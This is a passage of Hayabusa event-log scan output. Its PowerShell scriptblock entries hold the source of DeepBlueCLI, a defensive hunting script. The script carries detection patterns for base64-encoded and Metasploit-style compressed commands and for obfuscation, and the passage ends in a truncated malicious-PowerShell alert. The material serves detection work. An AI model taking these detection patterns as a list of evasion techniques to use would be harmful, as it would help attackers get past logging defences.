01:41:37.553 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:37.559 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ #$eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} """,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:37.559 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ #$eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} """,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:37.559 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:37.559 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:37.559 +09:00,SEC511,4104,high,Exec,Malicious PowerShell 